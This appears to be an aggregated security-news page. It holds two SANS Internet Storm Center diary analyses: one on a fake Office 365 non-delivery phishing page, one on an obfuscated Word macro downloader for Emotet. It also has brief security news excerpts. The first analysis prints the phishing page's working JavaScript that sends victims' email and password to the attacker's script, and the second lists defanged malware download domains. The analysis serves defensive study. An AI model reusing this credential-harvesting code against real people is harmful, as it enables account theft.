Here is a nice example of phishing attack that I found while reviewing data captured by my honeypots. We all know that phishing is a pain and attackers are always searching for new tactics to entice the potential victim to click on a link, disclose personal information or more…

This time, the email mimicks a fake NDR (“Non Delivery Receipt”) from Microsoft Office 365. Here is an official one (just grabbed as is from Google image):


You probably already received this kind of notification. Office 365 being very popular, chances are increasing daily. Now, let’s have a look at the fake one:

Note also the interesting sender email address, this inspires extra trust isn’t it?

If you click on the link to resend the mail, guess what? The bad guy asks you to enter the password related to the email address passed as argument in the URL:

Here is the piece of code called when you submit the form:

function sendmails() {
  var em = $('#testx').val();
  var ps = $('#pass').val();
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      var response = JSON.parse(this.responseText);
      if (response.msg == "donesend") {
        $(".login_form").hide();
        $(".thanks").show(); setTimeout("window.location.href='https://outlook.office365.com/owa/?realm';",5000);
      } else {
        $("#warning").empty();
        $('#warning').append('Your email or password is incorrect. If you don\'t remember your password,<a href="#"> reset it now.<a/>');
      }
    }
  };
  xhttp.open("GET", "sendx.php?user=" + em + "&pass=" +ps, true);
  xhttp.send();
}

It is based on XMLHttpRequest[1] which allows the browser to make a query to another page without reloading the first one. Depending on the results of sendx.php, you get a warning message or a redirect to the official Outlook homepage. My guess is that the PHP code tries to validate the credentials against a Microsoft service.

[1] https://www.w3schools.com/xml/xml_http.asp

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Reader Vince asked for help with the analysis of a malicious Word document. He started the analysis himself, following the method I illustrated in diary entry "Word maldoc: yet another place to hide a command".
Following this method, Vince found a shell statement:

And then searched for string zOSpqpzMSfs, but couldn't find the PowerShell command.

In the diary entry followed by Vince, I search for a VBA string, that is a string delimited with double quotes: "j9tmrnmi". Because this VBA string is used to identify an object that we can find in the streams of the OLE file.
String zOSpqpzMSfs, what Vince is searching, is actually a VBA variable name, and not a VBA string. The value of this variable is calculated at run time, and is not explicitly stored as an object property:

That is why the method followed by Vince does not work for this sample. You need to find the value of the variable, for example by reverse engineering the VBA statements and then calculate the value accordingly.

But there is also a "quick-and-dirty" method that I illustrated in diary entry "Quickie: String Analysis is Still Useful": just search for long strings (printable character sequences) in the document file, regardless of the internal file structure.
This works for Vince's sample (here I'm grepping cmd to keep the output short):


What we have here, is a PowerShell command obfuscated with a DOSfuscation technique.

This command-line statement selects characters from the string in red using indices in yellow:

to build the following command:

I used Python to do the indexing and concatenation to decode the PowerShell command:


And this PowerShell command is a downloader: a command that downloads and executes a malicious executable.

Notice that this downloader tries 5 URLs:

wpthemes[.]com
tom-steed[.]com
bobvr[.]com
alexzstroy[.]ru
herbliebermancommunityleadershipaward[.]org

to download an Emotet variant.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
phpMyAdmin CVE-2018-19968 Local File Include Vulnerability
 

Posted by InfoSec News on Dec 12

https://www.healthcareitnews.com/news/european-perspective-how-hospitals-should-be-approaching-gdpr-compliance

By Mike Miliard
Healthcare IT News
December 11, 2018

Since the European Union enacted its General Data Protection Regulation
law this past May, it's probable that many healthcare organizations in the
U.S. have been trying hard not to think much about it.

But most should be paying a lot more attention to the rules since, even if...
 

Posted by InfoSec News on Dec 12

https://www.cyberscoop.com/equifax-breach-report-house-oversight-committee/

By Sean Lyngaas
CYBERSCOOP
DEC 10, 2018

The devastating 2017 breach of credit-reporting company Equifax, which exposed
data on 148 million people, was "entirely preventable" had the company applied
proactive security measures, a congressional investigation has concluded.

"Had the company taken action to address its observable security issues prior
to...
 

Posted by InfoSec News on Dec 12

https://techcrunch.com/2018/12/11/supermicro-says-investigation-firm-found-no-spy-chips/

By Romain Dillet
Techcrunch.com
December 11, 2018

Supermicro has sent a letter to its customers saying that it has found no
evidence of malicious chips on its motherboards. The company asked
third-party company Nardello & Co. to audit Supermicro’s hardware.

On October 4, a Bloomberg report claimed that China's spies managed to
conceal tiny...
 

Posted by InfoSec News on Dec 12

https://www.wsj.com/articles/nsa-cyber-chief-says-companies-are-losing-ground-against-adversaries-11544548614

By Angus Loten
The Wall Street Journal
Dec. 11, 2018

NEW YORK -- Are we winning the war to protect data? Not according to Rob
Joyce, the National Security Agency's senior adviser on cybersecurity
strategy. Corporate leaders face increasing challenges in safeguarding
their online systems and data, he said.

"The trend is...
 

Posted by InfoSec News on Dec 12

https://www.dailynews.co.zw/articles/2018/12/11/govt-launches-cyber-security-booklet

By Pauline Hurungudo
Dailynews.co.zw
11 December 2018

HARARE - Information Technology, Postal and Courier services ministry, in
partnership with Econet, TelOne, Telecel, Greepys and ZITC have launched a
cyber-security booklet [1] and website to foster awareness and protection
from cyber-crime which has started to cripple many Zimbabweans,
particularly on...
 

Posted by InfoSec News on Dec 12

Forwarded from: THOTCON <info (at) thotcon.org>

This email is contains important information regarding the THOTCON 0xA Call
for Papers. Please read it completely.

*** BEGIN THOTCON TRANSMISSION

Greetings:

We are sending this transmission to make sure you are fully aware of our
Call for Papers and Call for Villages. Both of these speaking and
participation opportunities will close on January 1st, 2019. 

Call for...
 

Posted by InfoSec News on Dec 12

https://www.nytimes.com/2018/12/11/us/politics/trump-china-trade.html

By David E. Sanger, Nicole Perlroth, Glenn Thrush and Alan Rappeport
The New York Times
Dec. 11, 2018

WASHINGTON -- The cyberattack on the Marriott hotel chain that collected
personal details of roughly 500 million guests was part of a Chinese
intelligence-gathering effort that also hacked health insurers and the
security clearance files of millions more Americans,...
 
Internet Storm Center Infocon Status